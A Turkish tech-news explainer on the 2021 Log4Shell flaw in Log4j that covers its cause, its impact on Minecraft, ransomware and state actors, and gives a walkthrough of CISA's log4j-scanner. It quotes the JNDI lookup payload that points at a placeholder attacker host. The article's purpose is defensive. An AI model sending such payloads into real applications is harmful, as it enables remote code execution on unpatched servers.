Sonuç bulunamadı
Bütün Sonuçları Göster
Teknoloji tutkunu Technopatların ortak adresi: Technopat.net
  • Haber
  • Yapay Zeka
  • Tavsiyeler
  • Oyun
  • Video
  • Teknoloji
    • Mobil
    • Yazılım
    • Elektronik Alışveriş Fırsatları
    • Pratik
    • Ev Teknolojileri
    • Makale
    • Güvenlik
    • Ekonomi
    • İnternet
    • Giyilebilir Teknoloji
    • Sağlık
    • Yazıcı
    • Sosyal Medya
    • Otomobil
      • Elektrikli Otomobil
  • Sosyal
Teknoloji tutkunu Technopatların ortak adresi: Technopat.net
  • Haber
  • Yapay Zeka
  • Tavsiyeler
  • Oyun
  • Video
  • Teknoloji
    • Mobil
    • Yazılım
    • Elektronik Alışveriş Fırsatları
    • Pratik
    • Ev Teknolojileri
    • Makale
    • Güvenlik
    • Ekonomi
    • İnternet
    • Giyilebilir Teknoloji
    • Sağlık
    • Yazıcı
    • Sosyal Medya
    • Otomobil
      • Elektrikli Otomobil
  • Sosyal
Sonuç bulunamadı
Bütün Sonuçları Göster
Teknoloji tutkunu Technopatların ortak adresi: Technopat.net

Anasayfa - Makale - Log4Shell Güvenlik Zafiyeti Nedir? Neden Bu Kadar Ses Getirdi?

Log4Shell Güvenlik Zafiyeti Nedir? Neden Bu Kadar Ses Getirdi?

27 Aralık 2021 - 19:00
- Makale
log4j logosu

Şu sıralar bilişim dünyası Log4j kütüphanesinde çıkan kod yürütme açığıyla ve sebep olduklarıyla çalkalanıyor. Zafiyetin keşfedilip yayınlanmasından hemen sonra basına yansıyan veya yansımayan birçok sistem saldırganlarca hedef alındı ve etkilendi. Peki bu zafiyet neydi ve neden bu kadar can yandı?

Log4Shell‘i basitçe tarif edecek olursak, Java destekli uygulamalarda programcıların sıkça faydalandığı loglama kütüphanesi Log4j’nin 2.x sürümlerinde çalışma şeklinden faydalanarak kod yürütmeye imkan tanıyan bir açık. Alibaba bünyesindeki güvenlik araştırmaları ekibinden Chen Zhaojun tarafından Kasım ayında tespit edilip Apache Vakfına bildirildi ve ilk olarak Aralık ayının başlarında bilinmeyen bir Çinli aktör tarafından açık hale getirildi. İlk çıkan bu zafiyet örneğine CVE-2021-44228 kodu atandı. Daha sonraları farklı kodlar da atanan ekstra açıklar da bu süre zarfında çıkmaya devam etti.

Log4j, ilk olarak Türk bilgisayar programcısı Ceki Gülcü tarafından Java programlama diline yönelik geliştirildi ve 2.x sürümlerinden itibaren de Apache Yazılım Vakfı bu geliştirme sürecini üstlendi.

Biraz detaya inecek olursak kütüphanenin “Message Lookups” adı verilen ve günlük kayıtlarının ortam değişkenleri gibi bazı yapıları çağırması zafiyetin asıl nedeni diyebiliriz. Log4Shell dökümantasyonuna göre güvenlik yamaları uygulanmamış herhangi bir Log4j 2.x kütüphanesi kullanımında örneğin ${env:PATH} gibi bir girdi kaydedilmeye çalışıldığında doğrudan PATH mesajının yerine ortam değişkeni ekrana basılıyor.

JNDI (Java Naming and Directory Interface / Java Adlandırma ve Dizin Arabirimi) de işin içine girince ${jndi:java:comp/env} gibi bir kullanım mümkün hale geliyor. BlackHat USA 2016 da yapılan bir sunumda JNDI URI’lerinin doğrulanmadan kullanılmasının kod yürütme açıklarına neden olabileceği 4 sene önceden gösterilmişti. Böylece Log4j 2.x sürümlerinde varsayılan olarak etkin halde bulunan “Message Lookups” özelliği yüzünden varsayılan halde kullanıcı tarafından alınan girdilerin günlüğe yazdırılması kod yürütmeye imkan tanınmasına yol açtı.

Apache tarafından zafiyetin açıklanmasından sonra aynı hafta içinde yama yayınlansa da güvenlik araştırmacıları her seferinde zafiyetin halen var olduğunu ve çeşitli bypass yöntemleri kullanılarak çalıştırılabildiğini ispatladılar. En son 18 Aralık 2021’de 3. kez yama yayınlandı. Buna rağmen halen remote (uzaktan) olmasa da local bir saldırı yüzeyi tespit edildi. Risk halen ortadan kalkmış değil gibi gözüküyor.

Peki ya bunu bu kadar tehlikeli kılan şey ne?

Log4j yazılımcılar tarafından Java ile uygulama geliştirirken oldukça fazla kullanılan bir kütüphane. Neredeyse Java ile yazılmış birçok yazılımda Log4j’nin kullanıldığını söyleyebiliriz. ${jndi:ldap://[saldırganın sitesi veya ip adresi]/a} şeklindeki bir payload (kötü amaçlı yük) programın input alanlarından verildiğinde saldırganlarca hedeften bağlantı alınabiliyor.

Güvenlik araştırmacılarından John Hammond, Java ile yazılmış programlar arasında ilk akla gelen Minecraft’ta bile bu zafiyetin var olduğunu tespit etti. Sohbet alanından bahsettiğimiz yük gönderilerek hedef sunucunun kontrolü rahatlıkla ele geçirilebiliyor. Diyelim ki bir gün canınız sıkıldı ve kendi bilgisayarınızda Minecraft sunucusu kurup internetteki oyuncu topluluklarında paylaştınız. Kötü niyetli bir kişi sadece sunucunuza girip bu komutu göndermekle bile sisteminizi ele geçirebiliyor. Oldukça tehlikeli ve vahim bir durum. İlgili zafiyetin denendiği videoyu merak ediyorsanız aşağıdan izleyebilirsiniz.

BitDefender tarafından tespit edilen Khonsari Ransomware çetesi ise özellikle yamalanmamış güvensiz Minecraft sunucularını hedef alıyor. Bahsettiğimiz şekilde sunuculara gönderilen kod parçacığı sayesinde sunucu ve açığı kapatılmamış Minecraft sürümleriyle sunuculara bağlı olan istemcilerden kabuk/shell alınıyor. Daha sonrasında ise aktörler tarafından fidye yazılımı uzak sunucudan indirilerek hedef sistemlerde çalıştırılıyor. Burada oyuncu topluluğunu da oldukça ilgilendiren bir durum söz konusu.

Yalnızca bir oyun olan Minecraft bir yana, Java bazlı uygulamalar ve çözümler pek çok sektörde aktif olarak kullanılıyor. Log4Shell açığının etki alanı başta finans kuruluşları olmak üzere mobil cihazlar ve uygulamalar, IoT yapıları, web siteleri, sanallaştırma çözümlerinin neredeyse tamamına yakın bir kısmını kapsıyor. Bu kütüphanenin kullanılmadığı Java uygulamaları oldukça az sayıda. Zafiyetin yayınlanmasından hemen sonra çeşitli tehdit aktörlerinin her yerden mantar gibi çıktığını, yoğun bir şekilde fidye yazılımı saldırılarının yaşandığı biliniyor.

Devlet Destekli Log4Shell Saldırıları ve Bağımsız Siber Aktörler

Log4Shell gibi etkili bir zafiyetin zaten bağımsız ve finansal motivasyona aktörlerin kullanması kadar devlet destekli grupların da hedeflere yönelik kullanmaya başlaması oldukça olağan diyebiliriz.

Microsoft Güvenlik Merkezi tarafından yayınlanan rapora göre Çin, Kuzey Kore ve İran gibi ülkelerin siber aktörleri tarafından Log4Shell açığı çeşitli kurumsal sistemlere karşı kullanıldı. Microsoft’un belirttiğine göre İran’lı aktörler daha önceden de Phosphorus adıyla, Çin’li aktörler ise Hafnium APT adıyla tespit edilmişti.

Ayrıca bağımsız aktörlerin de bu süre zarfında boş durduğunu söyleyemeyiz. Oracle’ın Java RE kurulum ekranında “kendimi bildim bileli yazdığı” gibi “3 milyar cihaz” üzerinde Java veya Java yazılımları çalışıyor. Log4j kütüphanesi de sıklıkla kullanılan bir kütüphane olduğundan Log4Shell zafiyeti botnet ve fidye yazılımı (ransomware) çetelerinin hayli ilgisini çekti. Binlerce hatta milyonlarca sistemi dışarıdan sistemlere girdi yapan ufak bir script ile ele geçirip kontrole alabilmek kazanç sağlamak adına saldırganlar için oldukça önemli bir fırsat oldu diyebiliriz.

Daha önce siber dünyada en son bu çapta bir hareketlilik EternalBlue ve ShellShock zafiyetleri yayınlandığında ortaya çıkmıştı. CloudFlare, Cisco, Red Hat, iCloud, ElasticSearch, Twitter, Steam gibi birçok dev bu kütüphaneyi kullanıyor. Tabi şu anda bu platformlarda zafiyet yamalandığı için kullanmakta sıkıntı olmasa da ilk çıktığında oldukça dehşet verici etki yaptığını söyleyebiliriz.

BitDefender araştırmacılarının 11 ila 15 Aralık arasında toplamış olduğu telemetri verilerine göre en çok saldırı çıkışı görülen ülkeler Almanya ve Amerika Birleşik Devletleri iken hemen arkasından yüzde 34’lük bilinmeyen bir aktör oranı görüyoruz. En çok saldırıya uğrayan ülkelerde ise ABD, Kanada ve İngiltere başı çekiyor. Bu ülkelerin diğerlerine kıyasla daha çok saldırıya uğramasının nedeninin birçok teknoloji ağırlıklı, tabiri caizse paralı şirketin bu konumlarda yer alması olduğunu söyleyebiliriz.

Dolaylı Olarak 35.000 Java Paketi Log4j Zafiyetinden Etkilendi

Siber güvenlik odaklı bir bakış açısında programları ve geliştirilen yazılım teknolojilerini çoğu zaman birbirinden ayrı düşünürseniz hata edersiniz. Google’ın araştırmasına göre Log4j’deki zafiyetten ötürü 35.000 geliştirme paketi veya mini kütüphane diyebileceğimiz yapı etkilendi. Bunu zincirleme kaza gibi düşünebiliriz. Biri diğerine hızla çarpınca o aracın etkisiyle diğer araçlar da kazadan payını almakta.

2.620 pakette yer alan bu dolaylı güvenlik açıkları ise Log4Shell’in ortaya çıktığı ilk hafta içinde çoğunlukla yamandı. Geriye kalan 31 bin küsur paketteki zafiyetin yamalanıp yamalanmadığını ise henüz bilmiyoruz.

BreachQuest CEO’su Jake Williams’a göre Log4j’nin olumsuz etkilerinin anlaşılması biraz fazla zaman alacak. Zira çok fazla yazılıma doğrudan olmasa bile bahsettiğimiz gibi dolaylı yönden dahil bir kod kütüphanesi. Ek olarak saldırıların başka zincirleme etkileri de bulunuyor. Saldırganlar ilk erişimi kazandıktan sonra sistemde geniş yetkilere ulaşmak için birtakım hak yükseltme (privilege escalation) ve sızılan network üzerinde yayılabilmek için yanal hareket (lateral movement) süreçleri izleyecekler. Bunlar da hem saldırganlar açısından hem de yeni çıkan bir zafiyetin etkisiyle boğuşan “blue team ekipleri” (terminolojide sistemlerin güvenliğinde sorumlu olan birimler) için oldukça zor anlaşılır diyebileceğimiz zaman alıcı bir süreç.

Korku Satan Fırsatçılar – Ücret Karşılığı Yalnızca Log4Shell Testi Yapanlar

Dünya ve bilişim tarihine dikkat edin, her daim birtakım olayların etkisiyle oluşan korku havasından nemalanmaya çalışan fırsatçılar olmuştur. Savaşları fırsata çevirenler, krizleri lehlerine kullananlar, karaborsacılar ve dahası… Siber dünyada da bu böyle. Ne zaman yüksek potansiyelli ve korku salan bir zafiyet ortaya çıkarsa meydana çıkıyorlar.

Normal şartlarda kurum ve kuruluşlara güvenlik testi uygulanması gerektiğinde belli başlı planlamalar yapılıp, kriterler belirlenirken ve buna uygun bir şekilde tercih edilen test yöntemine göre bazı metodolojiler izlenirken; yalnızca “Log4Shell” testi yapmak ve sadece bunun için insanlardan binlerce lira para talep etmek açıkça fırsatçılıktan başka bir şey değil.

Güvenliğin gerek fiziksel, gerek teknolojik, gerek de yazılımsal olmak üzere her yönüyle bir bütün olduğunu aklımızdan çıkarmamakla beraber, illa böyle bir test yapılacaksa önce kurumun veya kuruluşun Log4j kütüphanesini kullanıp kullanmadığının öğrenilmesi gerekmektedir. Özellikle son zamanlarda çoğalan bu tarz fırsatçılara karşı uyarmakta yarar görüyoruz.

CISA Log4j-Scanner Kullanarak Zafiyet Tespiti

CISA (Amerikan Siber Güvenlik ve Altyapı Güvenliği Ajansı) tarafından Log4j zafiyetinin tespitine yönelik oldukça gelişmiş bir araç yayınlandı. Sistemlerinizin bu zafiyetten etkilenip etkilenmediğini bu araç yardımıyla rahatlıkla öğrenebilirsiniz.

Aracın mantığı girdi alanlarına kötü amaçlı payload’ın gönderilip bir DNS isteği almaya dayanıyor. Eğer araç tarafından gönderilen payload hedefte başarılı olursa belirttiğimiz DNS adresine bir DNS isteği dönüyor. Daha çok uzatmadan aracın hemen kullanımını gösterelim, böylece ne demek istediğimiz daha iyi anlaşılacaktır.

1 – Öncelikle aracı GitHub üzerinden edinmemiz gerek. Ben halihazırda Ubuntu kullandığım için işlemleri bu işletim sistemi üzerinden anlatacağım. Sizler de kendi sisteminize göre yapabilirsiniz, sorun olmaz.

Yayınlanan zafiyet tarayıcısının GitHub sayfasına gidelim. Ben Git kullandığım için buradaki adresi kopyalayarak terminal üzerinden git clone komutu ile repoyu indireceğim ve indirdiğim dizine cd komutu ile geçiş yapacağım, daha kolayıma geliyor. Sizler Git kullanmıyorsanız “Download ZIP” diyerek de indirebilirsiniz.

2 – İçine girdiğimiz dizini ls -la ile kontrol edelim. Gördüğünüz gibi inmiş. Bizim tarama aracımız ise bu dizinin içindeki log4-scanner klasöründe. Bu nedenle cd log4-scanner komutunu girip, ls -la ile kontrol ediyoruz.

3 – Şimdi aracımızın bulunduğu dizine başarıyla girdiğimize göre aracımızı kullanmak için gereken bazı yorumlayıcıları ve bağımlılıkları yüklememiz gerekiyor. Bu araç Python 3 ile geliştirilmiş, yani sistemimizde Python 3 yorumlayıcısı yoksa önce onu kurmalıyız. Zaten varsa doğrudan benim yaptığım gibi pip install -r requirements.txt komutu yardımıyla bağımlı paketleri kurabilirsiniz.

4 – Bağımlılıkları da kurduğumuza göre aracımızı çalıştırılabilir hale getirmek için chmod +x log4j-scan.py komutu ile yürütebilirlik izni veriyorum. Daha sonra aracı nasıl kullanabileceğimize dair detaylı bilgi edinmek için ./log4j-scan.py --help komutunu giriyorum. Gördüğünüz gibi kullanabileceğimiz bütün opsiyonlar karşımızda.

5 – Sıra geldi test edilecek web sitelerini veya sayfaları liste haline getirmeye. Aracımıza bir liste vermemiz gerekiyor ki onların üzerinde tarama yapabilsin. nano taramalistesi.txt komutu ile bir metin belgesi oluşturup içerisine tarama yapmak istediğim web sitelerini yazıyorum. Daha sonra CTRL+S ve CTRL+X ile kaydedip çıkıyorum.

6 – Tarama listem oluşmuş mu diye bakmak için tekrar “ls -la” yapıyorum. Gördüğünüz gibi oluşmuş.

7 – Bir şey hariç her şeyimiz tamam, zafiyet tarayıcısının hedeflere göndereceği payloadlar çalışırsa bir yere (DNS sunucusu gibi) istek yapması ve bizim onu görmemiz gerekiyor. Böylelikle zafiyetin var olup olmadığını anlayabiliyoruz.

Bunun için Dnslog.cn diye bir hizmet var. Tek tık ile isteklerin basit bir şekilde gönderilebileceği bir subdomain oluşturabiliyorsunuz. Buraya gelip “Get SubDomain” diyelim ve çıkan adresi kopyalayalım. Eğer sizler DNS isteği bu tarz dış ortamlara yapılsın istemiyorsanız kendi server yapınız üzerinde de DNS sunucusu kurup istekleri loglayabilirsiniz.

8 – Artık taramaya başlayabiliriz. ./log4j-scan.py --test-CVE-2021-45046 --custom-dns-callback-host [isteğin gideceği DNS sunucusu] -l [listeniz.txt] komutunu girerek denemeleri başlatıyorum. Buradaki komutu siz kendinize göre düzenlemelisiniz. Ben programın bütün özellikleri yerine yalnızca CVE-2021-45046’yı test etmesini istedim. Siz spesifik olarak değil de Log4Shell hakkında genel tarama olsun diyorsanız --run-all-tests parametresini kullanabilirsiniz.

Test bittiğine göre DNSLog.cn adresine dönelim ve herhangi bir istek gelip gelmediğine bakalım.

9 – “Refresh Record” diyelim ve biraz bekleyelim.

Herhangi bir istek gelmemiş gözüküyor. Gelmemesi de normal çünkü Technopat web sayfası üzerinde Java teknolojileri kullanılmıyor. Dolayısıyla Log4j kütüph0anesini de kullanmadığımız için bu zafiyetten etkilenmiyoruz. Sizin denediğiniz sistem etkileniyorsa burada isteğin geldiği sistemin IP adresi, zamanı gibi bazı çıktıları göreceksiniz.

Geliştiriciler Log4Shell Ve Benzer Zafiyetlere Karşı Nasıl Önlem Alabilir?

Geliştirici veya sistem yöneticisi iseniz Log4Shell zafiyetinin sistemlerinizde var olup olmadıklarını anlayabilmek ve benzer zafiyetlere önlem alabilmek için ÇözümPark ekibi çatısı altında bu konu hakkında beraber birçok uzmanın hazırlamış olduğu oldukça bilgilendirici bir canlı yayın kaydı bulunuyor. Hemen aşağıdan izleyebilirsiniz.

Ayrıca siber güvenlik şirketi Prodaft’ın kurucu ortağı olan Mehmet Dursun İnce’nin de zafiyeti detaylıca anlattığı Twitch kesitini aşağıdan izleyebilirsiniz.

Sonuç

Amacımız ortaya çıkar çıkmaz sizlere hızlıca fakat yalan yanlış haberleri ulaştırmak değil, konu hakkındaki en doğru bilgiyi vermek olduğundan benim açımdan bu yazıyı hazırlamak oldukça zor oldu diyebilirim. Log4Shell zafiyetinin neyden kaynaklandığına, ne gibi etkileri olduğuna, fırsatçılara ve nasıl sistemlerinizde bu açığı bulup kapatabileceğinize olabilecek en iyi şekilde değinmeye çalıştık. Umarız ki sizler de beğenmişsinizdir.

Merak ettikleriniz ve eleştirileriniz için hemen aşağıdan yorum yapabilirsiniz. Siber güvenlik ve bilgisayar dünyasının diğer bütün alanları hakkında doğru bilgi çin Technopat.Net’i takipte kalın.

Etiketler: alibaba cloudapacheapache software foundationcisaCVE-2021-44228CVE-2021-45046Cyber Securitygüvenlik açığıHaberLog4jlog4j nedirlog4j RCElog4j-scannerlog4j2Log4Shelllog4shell nedirsiber güvenliksiber saldırıvulnerabilityzafiyet
PaylaşPaylaşTweetYollaPaylaş
M. Akil Gündoğan

M. Akil Gündoğan

https://www.technopat.net/

Yorum Yap Yanıtı iptal et

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

RSS Technopat Sosyal

  • M.2 SSD Kutusu Önerisi
  • Acer Aspire 7 ekranını değiştirerek FPS artırmak mümkün mü?
  • Gigabyte B450M S2H anakartta TPM 2.0 nasıl açılır?
  • EA'de Rus mailine kayıtlı
  • Acer Nitro 5 CPU 0 GHz hatası
  • 1 TB taşınabilir SSD önerisi
  • TV için hareketli duvar askı aparatı önerisi
  • 14600K 6800 XT sistemde oyuna girince ekran tamamen gidiyor
  • Numara ne zaman taşınır?
  • Honor Magic Pad 2 alınır mı?

Technopat Video

Şu an oynayan

Batarya devi gerçekten bu kadar başarılı mı? vivo V60 5G inceleme!

vivo V60 5G inceleme

Batarya devi gerçekten bu kadar başarılı mı? vivo V60 5G inceleme!

Akıllı Telefon
ASUS ProArt P16 İnceleme

ASUS ProArt P16 inceleme! 4K OLED, Ryzen AI 9 HX 370, RTX 5070 ve dahası

Haber
Japonya Gezi Notları

Japonya Notları: Tokyo’dan Osaka’ya, Kyoto’dan Nara’ya—yemek, ulaşım, alışveriş ve kültürün içinden

Haber

Teknoloji tutkunu Technopatların ortak adresi: Technopat.net!

Güncel teknoloji, internet, donanım, yazılım, oyun ve daha fazlası haber, makale ve videolar ile Technopat’ta sizlerle.


01010100 01100101 01100011 01101000 01101110 01101111 01110000 01100001 01110100

Kategoriler

  • Yapay Zeka
  • Ev Teknolojileri
  • Makale
  • Video

Sosyal Medya

Bağlantılar

  • Hakkında
  • Haber
  • Video
  • Sosyal
  • Çerez Politikası
© 2011-2025 Technopat. Tüm Hakları Saklıdır.
Netse
Çerez Onayı
Web sitemizi ziyaret ettiğinizde, kullanıcı deneyiminizi daha iyi hale getirmek, hizmetlerimizi size daha etkin bir şekilde sunabilmek için çerezler (cookies) ve benzeri araçlar kullanıyoruz. Çerezler, internet sitesinin düzgün çalışmasını sağlamak, içeriği kişiselleştirmek, sosyal medya özellikleri sağlamak ve trafik analizi yapmak için kullanılan küçük metin dosyalarıdır. Çerezleri nasıl kullandığımız ve kişisel verilerinizi nasıl işlediğimiz hakkında daha fazla bilgi almak için çerez politikamızı ve kişisel veri politikamızı inceleyebilirsiniz.
Fonksiyonel Her zaman aktif
Teknik depolama veya erişim, sadece kullanıcının açıkça talep ettiği belirli bir hizmetin kullanılmasını sağlama amacıyla veya iletişimin elektronik iletişim ağı üzerinden iletilmesinin tek amacıyla yasal olarak kesinlikle gereklidir.
Tercihler
Teknik depolama veya erişim, abone veya kullanıcı tarafından istenmeyen tercihlerin depolanması yasal amacıyla gereklidir.
İstatistikler
Sadece istatistiksel amaçlarla kullanılan teknik depolama veya erişim. The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.
Pazarlama
Teknik depolama veya erişim, reklam gönderimi için kullanıcı profilleri oluşturmak veya kullanıcıyı bir web sitesinde veya birden fazla web sitesinde benzer pazarlama amaçları için takip etmek amacıyla gereklidir.
Seçenekleri yönet Hizmetleri yönetin {vendor_count} satıcılarını yönetin Bu amaçlar hakkında daha fazla bilgi edinin
Tercihleri yönet
{title} {title} {title}
Onayı Yönet
En iyi deneyimleri sunmak için, cihaz bilgilerini saklamak ve/veya bunlara erişmek amacıyla çerezler gibi teknolojiler kullanıyoruz. Bu teknolojilere izin vermek, bu sitedeki tarama davranışı veya benzersiz kimlikler gibi verileri işlememize izin verecektir. Onay vermemek veya onayı geri çekmek, belirli özellikleri ve işlevleri olumsuz etkileyebilir.
Fonksiyonel Her zaman aktif
Teknik depolama veya erişim, abone veya kullanıcı tarafından açıkça talep edilen belirli bir hizmetin kullanılmasını sağlamak veya bir elektronik iletişim ağı üzerinden bir iletişimin iletimini gerçekleştirmek amacıyla meşru bir amaç için kesinlikle gereklidir.
Tercihler
Teknik depolama veya erişim, abone veya kullanıcı tarafından talep edilmeyen tercihlerin saklanmasının meşru amacı için gereklidir.
İstatistik
Sadece istatistiksel amaçlar için kullanılan teknik depolama veya erişim. Sadece anonim istatistiksel amaçlar için kullanılan teknik depolama veya erişim. Mahkeme celbi, İnternet Hizmet Sağlayıcınızın gönüllü uyumu veya üçüncü bir taraftan ek kayıtlar olmadan, yalnızca bu amaçla depolanan veya alınan bilgiler genellikle kimliğinizi belirlemek için kullanılamaz.
Pazarlama
Teknik depolama veya erişim, reklam göndermek için kullanıcı profilleri oluşturmak veya benzer pazarlama amaçları için kullanıcıyı bir web sitesinde veya birkaç web sitesinde izlemek için gereklidir.
Seçenekleri yönet Hizmetleri yönetin {vendor_count} satıcılarını yönetin Bu amaçlar hakkında daha fazla bilgi edinin
Tercihleri görüntüle
{title} {title} {title}
Sonuç bulunamadı
Bütün Sonuçları Göster
  • Giriş
  • Teknoloji Haberleri
  • Sosyal
  • Video
  • Tavsiyeler
  • İncelemeler
    • Video İncelemeler
  • Güvenlik
  • Oyun
  • Makale
    • Pratik
    • Yazar Köşeleri

© 2025 Technopat
Sorularınız için Technopat Sosyal